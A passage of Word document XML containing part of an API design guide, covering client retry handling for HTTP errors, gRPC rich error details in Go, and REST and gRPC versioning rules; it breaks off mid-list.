    <w:p w14:paraId="49C36C05" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="6913D9B3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Client handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399398B8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  if response.status == 429:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E56ABE0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      retry_after = response.headers["Retry-After"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0C92D6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      wait(retry_after)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1369C2EF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      retry()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B67FE39" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  elif response.status &gt;= 500:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F90C1C6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      retry_with_backoff()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F66A671" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  elif response.status &gt;= 400:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100C0AE8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">      handle_client_error(response.json()["error"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390B0F31" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 gRPC Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7852AB61" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1685AD9D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Rich error details (Google's error model)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21621FCD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>import "google/rpc/error_details.proto";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6AC50D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="37166BCD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Server returns structured error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72325669" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>st := status.New(codes.InvalidArgument, "invalid order request")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1029EA2A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>st, _ = st.WithDetails(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33091604" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    &amp;errdetails.BadRequest{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9E593D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        FieldViolations: []*errdetails.BadRequest_FieldViolation{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD2656F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            {Field: "quantity", Description: "must be &gt; 0"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718A18EE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            {Field: "price", Description: "must be positive"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EB58D9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BC565F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384A56AD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    &amp;errdetails.RetryInfo{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EBEE5C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        RetryDelay: durationpb.New(5 * time.Second),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74240C25" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F2E7A5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AD76AF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>return nil, st.Err()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AF1E4D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="702A13DC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Client handles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1948DF5A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>st := status.Convert(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAD4010" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>switch st.Code() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607F5A69" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>case codes.NotFound:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC5B9E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    // Handle not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25137E56" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>case codes.DeadlineExceeded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E27D15" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    // Handle timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E598A6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>case codes.Unavailable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711DE242" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    // Retry with backoff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227DE288" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52684C41" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>for _, detail := range st.Details() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06423315" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    if badReq, ok := detail.(*errdetails.BadRequest); ok {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AE5B76" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        for _, violation := range badReq.FieldViolations {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF78580" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">            fmt.Printf("Field %s: %s\n", violation.Field, violation.Description)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C94BD9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466FC78E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49477903" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FA4D8B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="7DED11C5">
          <v:rect id="_x0000_i6538" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7DA515" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Evolution and Versioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353323CB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1 REST API Versioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F104AE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4D4A33" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>URL versioning (most common):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522448D7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  /api/v1/users → version 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550B306D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  /api/v2/users → version 2 (breaking changes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294DBB03" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260C2DC5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Challenge: maintaining multiple versions simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C44A393" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Strategy: support v(N) and v(N-1), deprecate older.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30442368" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="410F20ED" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Header versioning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6EFD42" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Accept: application/vnd.myapp.v2+json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F6D306" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400A655F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Advantage: cleaner URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DFBF55" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Disadvantage: less discoverable, harder to test in browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BC0734" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="136D423D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Non-breaking changes (no version bump needed):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6192EAA9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ✓ Adding new optional fields to response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4140B1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ✓ Adding new endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5BA456" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ✓ Adding new optional query parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBC4F82" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F430704" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Breaking changes (require version bump):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597107A8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve"> Removing fields from response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603FA4C0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve"> Changing field types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A04919" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve"> Changing URL structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1420F46A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve"> Changing semantics of existing fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4D400D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2 gRPC API Versioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619F1FBE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3091A0E1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Package versioning (in proto file):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD59DF2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>package myapp.orders.v1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67192E52" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="4C12DEB9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>service OrderService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF73E5F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  rpc GetOrder(GetOrderRequest) returns (Order);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2069D9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58899188" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="30A0F73B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>// New version with breaking changes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3970B2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>package myapp.orders.v2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A52378" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="724EA562" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>service OrderService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2B84EE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  rpc GetOrder(GetOrderRequest) returns (Order);  // Different fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769780B0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D30E529" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="47D42E3C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Non-breaking changes (no version bump):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FE938E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// These are always safe due to protobuf's wire format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6F8DAC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ✓ Adding new fields (new field numbers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689AC637" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ✓ Adding new RPC methods to existing service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B317CE" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ✓ Adding new enum values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A4FBEC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  ✓ Renaming fields (wire format uses numbers, not names)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15616E85" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D9995D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>// Breaking changes (require new package version):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DD75B4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
